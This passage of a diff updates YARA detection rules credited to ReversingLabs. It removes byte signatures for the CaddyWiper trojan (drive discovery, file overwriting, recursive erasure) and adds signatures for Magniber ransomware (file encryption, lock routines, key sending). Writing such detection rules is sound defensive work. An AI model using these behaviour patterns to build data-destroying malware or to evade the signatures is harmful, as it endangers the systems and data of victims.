-            68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B C8 32 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8B C1
-            F7 E6 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B C8 32 85 ?? ?? ?? ?? 88 85 ?? ??
-            ?? ?? 8B C1 F7 E6 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B C8 32 85 ?? ?? ?? ??
-            88 85 ?? ?? ?? ?? 8B C1 F7 E6 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 32 85 ?? ??
-            ?? ?? 8D 4D ?? 88 85 ?? ?? ?? ?? 8D 51 ?? 0F 10 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 0F 11 45 ?? C6 45 ?? ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 45 ?? 51
-            50 8D 4D ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 45 ?? ??
-            0F 57 C0 89 8D ?? ?? ?? ?? 0F 11 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6 C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? BF ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 4D ?? 66 66 66
-            0F 1F 84 00 ?? ?? ?? ?? 8A 84 35 ?? ?? ?? ?? 32 C1 88 44 35 ?? 8B C1 F7 E7 6A ?? 68
-            ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 46 8B C8 83 FE ?? 72 ?? 0F 10 45 ?? 8B BD ?? ?? ??
-            ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 8D 51 ?? 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
-            ?? 0F 1F 00 8A 01 41 84 C0 75 ?? 2B CA 8D 45 ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? BE ??
-            ?? ?? ?? 89 B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 6A
-            ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C9 89 8D ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 51 FF B5 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ??
-            ?? 8B CF C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 51 ?? 8A 01 41 84
-        }
-		$find_shared_network_drives_p3 = {
-            C0 75 ?? 2B CA 51 57 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45
-            ?? 8D 4D ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 83 CE ?? 51 0F 10 00 68 ?? ?? ?? ?? 6A ?? 0F 11 45 ?? 89 B5 ?? ??
-            ?? ?? F3 0F 7E 40 ?? 66 0F D6 45 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00
-            ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 85
-            C0 0F 94 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B
-            49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 83 FA
-            ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ??
-            83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 80 BD ?? ?? ?? ?? ?? 0F 84
-            ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? 51 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? 8B CE C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 56 8D
-            4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 75 ?? 8B 7D ?? BA ?? ?? ?? ?? 0F 43 75 ?? 33 C9
-            85 FF 74 ?? 0F 1F 40 ?? 0F B6 04 31 41 33 C2 69 D0 ?? ?? ?? ?? 3B CF 72 ?? 23 95 ??
-            ?? ?? ?? 8B BD ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B
-            04 D7 8B F0 89 85 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 3B C1 75 ?? 8B C1 EB ?? 8B 44 D7
+		$encrypt_files_1 = {
+            00 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ??
+            26 DE ?? 26 DE ?? 02 28 ?? ?? ?? ?? 13 ?? 02 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 28
+            ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? [1-2] 02 72 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 [1-2] 20
+            ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 6F
+            ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 02 7B
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ??
+            ?? ?? 13 ?? 11 ?? 16
         }
-		$find_shared_network_drives_p4 = {
-            8B 00 3B F0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 4E ?? 8B 79 ?? 8D 55 ?? 0F 43 55 ?? 83
-            79 ?? ?? 72 ?? 8B 09 3B 7D ?? 75 ?? 83 EF ?? 72 ?? 0F 1F 80 ?? ?? ?? ?? 8B 01 3B 02
-            75 ?? 83 C1 ?? 83 C2 ?? 83 EF ?? 73 ?? 83 FF ?? 74 ?? 8A 01 3A 02 75 ?? 83 FF ?? 74
-            ?? 8A 41 ?? 3A 42 ?? 75 ?? 83 FF ?? 74 ?? 8A 41 ?? 3A 42 ?? 75 ?? 83 FF ?? 74 ?? 8A
-            41 ?? 3A 42 ?? 74 ?? 1B C0 83 C8 ?? EB ?? 33 C0 85 C0 74 ?? 8B 36 8B 95 ?? ?? ?? ??
-            8B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? 50 8D
-            45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 84 C0 0F 45 F7 EB ?? 8B
-            BD ?? ?? ?? ?? 8B F1 8D 4D ?? E8 ?? ?? ?? ?? 3B F7 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ??
-            ?? 8D 7D ?? 83 7D ?? ?? 8B CE C7 45 ?? ?? ?? ?? ?? 0F 43 7D ?? C7 45 ?? ?? ?? ?? ??
-            C6 45 ?? ?? 8D 51 ?? 90 8A 01 41 84 C0 75 ?? 2B CA 51 56 8D 4D ?? E8 ?? ?? ?? ?? 8D
-            45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ??
-            68 ?? ?? ?? ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 10 00 0F 11 45 ?? F3 0F 7E 40 ?? 66 0F D6 45 ?? C7 40
-            ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? FF B5 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 78 ?? ?? 72 ??
-            8B 00 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
+		$encrypt_files_2 = {
+            72 ?? ?? ?? ?? A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ??
+            19 72 ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11
+            ?? 1C 72 ?? ?? ?? ?? A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 72 ?? ?? ?? ?? A2
+            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
+            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ??
+            1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
+            ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ??
+            72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2
+            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
+            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ??
+            1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
+            ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ??
+            72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2
+            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
+            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ??
+            1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
+            ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ??
+            72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2
+            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
+            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ??
+            1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
+            ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ??
+            72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2
+            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
+            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11
         }
-		$find_shared_network_drives_p5 = {
-            75 ?? 66 66 0F 1F 84 00 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 73 ?? 8D 85 ?? ??
-            ?? ?? 50 56 8D 85 ?? ?? ?? ?? 50 6A ?? 57 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
-            74 ?? 56 3D ?? ?? ?? ?? 75 ?? 81 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? EB ?? E8 ?? ?? ?? ?? 83 C4 ?? 33
-            F6 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 85 F6 74 ?? 8B BD ?? ?? ?? ?? 8B 4F ?? 39 4F ?? 74 ?? 8B D6 C7 41 ??
-            ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? 8D 7A ?? 0F 1F 80 ?? ?? ?? ?? 8A 02 42 84
-            C0 75 ?? 2B D7 52 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 40 ?? ?? EB ?? 8D 85 ?? ??
-            ?? ?? 50 51 8B CF E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 30 8D 85 ?? ?? ?? ?? 50 8B 7E ?? 57 56 E8 ?? ?? ??
-            ?? 8B 8D ?? ?? ?? ?? 8B D0 B8 ?? ?? ?? ?? 2B C1 83 F8 ?? 0F 82 ?? ?? ?? ?? 41 89 8D
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 56 ?? 89 17 8B 85 ?? ?? ?? ?? 8B 00 50 83 C0 ?? 50
-            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85
-            ?? ?? ?? ?? 40 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B BD
-            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? 41 89 8D ?? ?? ?? ?? 81 F9
-            ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B BD ?? ?? ?? ??
-            8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
-            2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45
+		$lockfile = {
+            02 7B ?? ?? ?? ?? 16 FE ?? 3A ?? ?? ?? ?? 21 EA 17 ?? ?? ?? ?? ?? ?? ??
+            03 73 ?? ?? ?? ?? [2-4] 6F ?? ?? ?? ?? [2-4] 21 00 65 CD 1D
+            00 00 00 00 FE ?? 16 FE ?? 2D ?? [2-4] FE ?? 16 FE ?? 2D ?? 03 28
+            ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? [1-2] 28 ?? ?? ?? ?? [1-2]
+            6F ?? ?? ?? ?? [1-2] 02 ?? [1-2] 28 ?? ?? ?? ?? [1-2] 03 [1-2] 28 ?? ??
+            ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? [1-2] ?? FE ??
+            16 FE ?? 2D ?? 2B ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            2B ?? 03 28 ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? [1-2] 28 ??
+            ?? ?? ?? [1-2] 6F ?? ?? ?? ?? [1-2] 02 ?? [1-2] 28 ?? ?? ?? ?? [1-2] 03
+            [1-2] 28 ?? ?? ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            2A
         }
-		$overwrite_files_1 = {
-            55 8B EC 83 EC ?? 53 8B 5D ?? 56 8B 75 ?? 53 56 FF 75 ?? 89 5D ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 3B C6 0F 85 ?? ?? ?? ?? 3B D3 0F 85 ?? ?? ?? ?? 57 8B 7D ?? 33 C0 89 45 ?? 85
-            FF 0F 84 ?? ?? ?? ?? 8B DE 6A ?? FF 75 ?? FF 77 ?? FF 77 ?? E8 ?? ?? ?? ?? 8B FA 8B
-            F0 8B 45 ?? 57 56 FF 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 03 DE 89 45 ??
-            8B C2 13 CF 89 45 ?? 39 5D ?? 75 ?? 3B C1 75 ?? 8B 7D ?? 33 F6 8B 1F 0F AF 5D ?? 85
-            DB 74 ?? 8B 45 ?? 8B FB 2B FE 3B C7 0F 42 F8 57 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B
-            45 ?? 83 C4 ?? 03 F7 80 7D ?? ?? 75 ?? 3B F0 74 ?? 3B F3 72 ?? 8B 7D ?? 8B 45 ?? 8B
-            5D ?? 01 75 ?? 50 53 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 3B C3 75 ?? 3B 55 ?? 75 ?? 8B
-            7F ?? 89 7D ?? 85 FF 0F 85 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3
+		$lockdir = {
+            03 28 ?? ?? ?? ?? 0A 03 28 ?? ?? ?? ?? 0B 16 0C 08 06 8E 69 FE ?? 2C ??
+            00 06 08 9A 28 ?? ?? ?? ?? 0D 05 09 28 ?? ?? ?? ?? 16 FE ?? 2D ?? 02 25
+            7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 06 08 9A 04 28 ?? ?? ?? ?? DE ??
+            26 DE ?? 26 DE ?? 08 17 58 0C 2B ?? 16 0C 08 07 8E 69 FE ?? 2C ?? 00 02
+            07 08 9A 04 05 28 ?? ?? ?? ?? 02 07 08 9A 04 28 ?? ?? ?? ?? DE ?? 26 DE
+            ?? 26 DE ?? 08 17 58 0C 2B ?? 2A
         }
-		$overwrite_files_2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 8B 75 ?? 8D 85 ?? ??
-            ?? ?? 57 68 ?? ?? ?? ?? 6A ?? 32 DB 50 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 83 7E ?? ?? 72 ?? 8B 36 56 E8 ?? ?? ?? ?? 8B F8 83 C4 ??
-            83 FF ?? 0F 84 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84
-            ?? ?? ?? ?? 80 B8 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B F0 83 C4 ??
-            89 B5 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 DB E8 ?? ?? ?? ?? 83 C4
-            ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 53
-            68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 75 ?? 85 D2 75 ?? 68 ?? ??
-            ?? ?? FF B5 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 75 ?? 50 E8 ?? ??
-            ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 68 ?? ?? ?? ?? 6A ?? 53 E8 ?? ?? ?? ?? 56 E8 ?? ??
-            ?? ?? 8B F0 8B C2 50 56 57 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 3B C6 75 ?? 3B
-            95 ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 53 57 E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 9D ?? ?? ?? ?? 6A
-            ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 0B C2 75 ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 0F
-            B6 DB 3D ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 D9 8B B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 85 F6 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 4D ?? 8A C3 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 68 ?? ?? ?? ?? 57
-            E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 85 D2 0F 85 ?? ?? ?? ?? 50
-            8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4
+		$sendkey = {
+            00 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 73 ?? ?? ?? ??
+            0C 08 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 72 ?? ?? ?? ??
+            02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 08 72 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 07 03 72 ?? ?? ?? ?? 08
+            6F ?? ?? ?? ?? 26 07 6F ?? ?? ?? ?? DE ?? 26 DE ?? 2A
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_volumes_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $find_shared_network_drives_p* ) ) and ( all of ( $overwrite_files_* ) )
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $encrypt_files_* ) ) and $lockfile and $lockdir and $sendkey )
 }
-rule REVERSINGLABS_Win32_Trojan_Caddywiper : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Magniber : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects CaddyWiper trojan."
+		description = "Yara rule that detects Magniber ransomware."
 		author = "ReversingLabs"
-		id = "ad437f29-4ad8-5a88-a0b6-03de55e7375f"
-		date = "2022-03-15"
-		modified = "2022-03-15"
+		id = "07b6c938-aa25-5ff6-95d2-9e0f84c41b41"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Win32.Trojan.CaddyWiper.yara#L1-L95"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Magniber.yara#L1-L114"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "178ff4171c09866f6b303bdff234beff1116d268995ee4dc236332e472d645b1"
+		logic_hash = "05b516f9b466489ea3a30e2fe5eb08290e85ece7a63e29e8bbbeb81c87d0a6f1"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Trojan"
-		tc_detection_name = "CaddyWiper"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Magniber"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$destroy_if_not_controller = {
-            50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 39 ?? 75 ?? EB ?? 8D 55 ?? 52 FF 55 ??
-            C6 45 ?? 43 C6 45 ?? 3A C6 45 ?? 5C C6 45 ?? 55 C6 45 ?? 73 C6 45 ?? 65 C6 45 ?? 72
-            C6 45 ?? 73 C6 45 ?? 00 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ??
-            C6 45 ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 83 7D
-            ?? ?? 73 ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8A 45 ?? 04 ?? 88 45 ?? EB ?? E8 ??
-            ?? ?? ?? 8B E5 5D C3
-        }
-		$erase_drive_data = {
-            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 4D ?? 89 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 95 ?? ?? ?? ?? 89 45 ?? 83
-            7D ?? ?? 74 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? 51 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 55 ?? 8B 45 ?? 50 FF 55 ?? 8A 4D ?? 88 4D ?? 8A
-            55 ?? 80 EA ?? 88 55 ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 E9 ?? 89 8D ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$erase_drives_recursively_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF C6 85 ?? ?? ?? ?? 2A C6 85
-            ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 5C C6 85 ?? ?? ?? ?? 00 8D 85 ?? ?? ?? ?? 50 8B 4D
-            ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ??
-            ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? 00 00 00 00
-            C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 64
-            C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 73
-            C6 85 ?? ?? ?? ?? 74 C6 85 ?? ?? ?? ?? 46 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 6C
-            C6 85 ?? ?? ?? ?? 65 C6 85 ?? ?? ?? ?? 41 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 6B
-            C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 65 C6 85 ?? ?? ?? ?? 00 C6 85 ?? ?? ?? ?? 72
